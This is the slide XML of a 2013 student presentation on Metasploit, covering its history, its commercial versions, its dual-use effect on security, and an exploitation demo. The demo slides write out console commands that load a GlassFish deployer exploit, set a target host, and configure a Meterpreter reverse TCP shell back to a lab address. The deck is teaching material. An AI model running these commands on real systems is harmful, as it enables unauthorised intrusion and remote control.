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5"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="292" r:id="rId4"/>
    <p:sldId id="325" r:id="rId5"/>
    <p:sldId id="369" r:id="rId6"/>
    <p:sldId id="368" r:id="rId7"/>
    <p:sldId id="370" r:id="rId8"/>
    <p:sldId id="379" r:id="rId9"/>
    <p:sldId id="374" r:id="rId10"/>
    <p:sldId id="380" r:id="rId11"/>
    <p:sldId id="375" r:id="rId12"/>
    <p:sldId id="381" r:id="rId13"/>
    <p:sldId id="376" r:id="rId14"/>
    <p:sldId id="382" r:id="rId15"/>
    <p:sldId id="377" r:id="rId16"/>
    <p:sldId id="378" r:id="rId17"/>
    <p:sldId id="329" r:id="rId18"/>
    <p:sldId id="371" r:id="rId19"/>
    <p:sldId id="383" r:id="rId20"/>
    <p:sldId id="367" r:id="rId21"/>
    <p:sldId id="372" r:id="rId22"/>
    <p:sldId id="384" r:id="rId23"/>
    <p:sldId id="385" r:id="rId24"/>
    <p:sldId id="390" r:id="rId25"/>
    <p:sldId id="392" r:id="rId26"/>
    <p:sldId id="364" r:id="rId27"/>
    <p:sldId id="373" r:id="rId28"/>
    <p:sldId id="386" r:id="rId29"/>
    <p:sldId id="387" r:id="rId30"/>
    <p:sldId id="388" r:id="rId31"/>
    <p:sldId id="389" r:id="rId32"/>
    <p:sldId id="365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3366FF"/>
    <a:srgbClr val="008689"/>
    <a:srgbClr val="33CC33"/>
    <a:srgbClr val="0066CC"/>
    <a:srgbClr val="9999FF"/>
    <a:srgbClr val="FF9900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5" autoAdjust="0"/>
    <p:restoredTop sz="98529" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="120" d="100"/>
          <a:sy n="120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5E7CB-68AE-4329-8211-7182DC4A6270}" type="datetimeFigureOut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13D0C-B4A8-4EBA-AFD6-6A239BBBF93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77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C683BF-05BC-41EC-9C6E-04BF5F875D76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267-5839-4A4F-B1E9-32B58C88C5C4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09561A7-E464-4737-A04F-7513DA4FE301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3BF-05BC-41EC-9C6E-04BF5F875D76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162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EE8-0729-44CE-8876-A607A69B547F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59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EFED-FFF4-42FB-B7AC-D4C77AE25C4B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140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AA50-66FE-4B4D-81EF-B5CF8EB68B8D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379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21C6-4A8C-4C71-9E14-CF68E2989B41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6462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6D0-EB2E-4663-83D2-190B29742D87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189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C33-D727-495A-97E8-8676B28D43DC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3379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A5FB-9266-4F0A-A4E2-54A6320EE670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243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EE8-0729-44CE-8876-A607A69B547F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8D-35E8-49EA-8740-6C0D40FB46D9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734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267-5839-4A4F-B1E9-32B58C88C5C4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3138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61A7-E464-4737-A04F-7513DA4FE301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361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EFED-FFF4-42FB-B7AC-D4C77AE25C4B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7DAA50-66FE-4B4D-81EF-B5CF8EB68B8D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9D21C6-4A8C-4C71-9E14-CF68E2989B41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6D0-EB2E-4663-83D2-190B29742D87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C33-D727-495A-97E8-8676B28D43DC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A5FB-9266-4F0A-A4E2-54A6320EE670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428B8D-35E8-49EA-8740-6C0D40FB46D9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A80FB-B464-4A39-AF78-088648F32951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80FB-B464-4A39-AF78-088648F32951}" type="datetime1">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:pPr/>
              <a:t>29/05/2016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951A-6135-42D4-BAC8-C44781B398E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4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9388"/>
            <a:ext cx="6705600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Done By:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>Justin Waelz, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Travis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Vanos</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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35" y="103870"/>
            <a:ext cx="9144000" cy="46805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lang="en-CA" sz="3200" b="1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Research Project Presentation</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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36512" y="6249052"/>
            <a:ext cx="233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Date:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>November 28, 2013</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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71438" y="1067916"/>
            <a:ext cx="9001125" cy="4267200"/>
            <a:chOff x="71438" y="1106016"/>
            <a:chExt cx="9001125" cy="42672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8" y="1106016"/>
              <a:ext cx="9001125" cy="426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839" y="4941168"/>
              <a:ext cx="1913271" cy="37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08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History of Metasploit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/>
              <a:t>March 27, 2007</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t> – Metasploit 3.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Rewritten </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>in the Ruby programming language</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>177 exploits, 104 payloads, 17 encoders, 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>NOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> generator modules, and, for the first time, 30 auxiliary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>October 21, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>2009 – Rapid7 acquires Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Quicker development cycle due to full-time developers as opposed to weekend hobbyists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Growth of user base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>The current user base is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>over 200,000 security researchers, contributors, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>users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65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23825"/>
            <a:ext cx="634365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History of Metasploit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r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>August 01, 2011</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t> – Metasploit 4.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>716 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>December 07, 2012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t> – Metasploit 4.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>1000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>exploits, 262 payloads, 562 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>auxiliary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>modules, 28 encoders, and 8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
              <a:t>NOPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>July 17, 2013</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>– Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>4.7</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>1141 exploits, 309 payloads, 720 auxiliary modules, 30 encoders, and 8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>NOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> generator modules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488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1814"/>
            <a:ext cx="8529240" cy="592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2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History of Metasploit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 smtClean="0"/>
              <a:t>Rapid7 also maintains commercial versions of Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Express ($5,000 per User per Year)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Value-focused Security Teams</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="2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Metasploit Pro ($25,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>per User per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Year)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Red Teams and Penetration Testing Consultants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1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Advanced features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Credential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Brute-Forcing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Evidence Collection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Rapid7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Support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6812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History of Metasploit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Rate of Exploit Development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Version </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>1.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>2.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>new exploit per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>month</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Version </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>2.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>3.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>new exploit per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>week</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Version </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>3.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>4.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>new exploits per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>week</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Version 4.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>4.5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>new exploits per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>week</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Version </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>4.5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smtClean="0"/>
              <a:t>4.7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>= 4 new exploits per week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03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9388"/>
            <a:ext cx="6705600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2250" b="1" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Affect of Metasploit on IT Security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987" y="711512"/>
            <a:ext cx="885698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5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______________________________________________________________________________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3Kom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="15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SuperHack</a:t>
            </a:r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 II Logon     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|______________________________________________________________________________|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User Name:          [   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="15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</a:t>
            </a:r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    ]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Password:           [               ]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[ OK ]                                     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|______________________________________________________________________________|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA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|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="15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                                            |</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="15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5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|______________________________________________________________________________|</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="15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Affect of Metasploit on IT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 lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/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CA" b="1" dirty="0" smtClean="0"/>
              <a:t>Dual-use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>tool with p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>re-tested </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>exploits and an easy to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Novice users and criminal hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Encourages the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>weaponization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="2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IT Professionals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Raises </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>awareness and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>provides defenders </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>with a way to measure their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>risk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="2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Developers</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Increased patch development to counter hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Zero-day vulnerabilities are now more dangerous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87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Affect of Metasploit on IT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 lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/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CA" b="1" dirty="0"/>
              <a:t>Not as simple as good versus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>evil</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Clean and tested exploits help IT professionals to even out the playing field against criminal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>The availability of exploits means that developers have to patch their software more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>often</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Thus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>, Metasploit is part of a co-evolutionary process between the exploitation of system flaws and the patching of said flaws, which ultimately results in an increase in system hardening across the board</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29602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9388"/>
            <a:ext cx="6705600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2250" b="1" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Basic Theory of Exploiting a System with Metasploit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185" y="313606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+---------------------------+---------------------------+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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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__________________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|                          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==c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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(______(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CA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(______(_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|""""""""""""|======[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           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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)=\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|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EXPLOIT  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          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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\\     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|_____________\_______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         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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\\    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|==[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msf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]============\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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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\\   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|______________________\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       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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RECON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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\\  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\(@)(@)(@)(@)(@)(@)(@)/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      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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    \\ 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*********************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+---------------------------+---------------------------+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   </a:t>
            </a:r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        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\'\/\/\/'/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          </a:t>
            </a:r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|        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======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                o         |      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.'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LOOT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'.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CA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|^^^^^^^^^^^^^^|l___ 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      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 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_||__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\  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PAYLOAD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|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""\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___,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|    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  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(_||_ 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\ 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|________________|__|)__|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|    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 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__||_)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|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|(@)(@)"""**|(@)(@)**|(@)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|    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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1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"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= = = = = = = = = = =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|     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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'--------------' </a:t>
            </a:r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+---------------------------+---------------------------+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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="696464"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Outline</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="3000" cap="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r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Metasploit Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>History of Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Affect of Metasploit on IT Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Basic Theory of Exploiting a System with Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Metasploit Module Design Goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Metasploit Module General Structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>GlassFish Server Exploitation Demonstration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Questions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50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Basic Theory of Exploiting a System with Metasploit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1.  Exploit Selection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1400" i="1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2.  Exploit Configuration</a:t>
            </a:r>
          </a:p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3.  Payload Selection</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1244780" y="2173646"/>
            <a:ext cx="7431676" cy="2923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300" u="sn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msf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use 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exploit/multi/http/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glassfish_deployer</a:t>
            </a:r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4780" y="3533229"/>
            <a:ext cx="7431676" cy="4924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300" u="sng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msf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exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1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glassfish_deployer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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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RHOST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10.0.0.1</a:t>
            </a:r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RHOST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192.168.0.100</a:t>
            </a:r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4780" y="5125571"/>
            <a:ext cx="7431676" cy="4924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300" u="sng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msf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exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1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glassfish_deployer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set PAYLOAD windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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meterpreter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CA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reverse_tcp</a:t>
            </a:r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PAYLOAD =&gt; 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windows/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meterpreter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reverse_tcp</a:t>
            </a:r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Basic Theory of Exploiting a System with Metasploit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21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4.  Payload Configuration</a:t>
            </a:r>
          </a:p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endParaRPr lang="en-CA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44780" y="2176110"/>
            <a:ext cx="7431676" cy="4924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300" u="sng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msf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exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1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glassfish_deployer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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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LHOST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10.0.0.2</a:t>
            </a:r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LHOST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192.168.0.99</a:t>
            </a:r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4780" y="2756936"/>
            <a:ext cx="7431676" cy="38933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300" u="sng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msf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exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1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glassfish_deployer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show options</a:t>
            </a:r>
          </a:p>
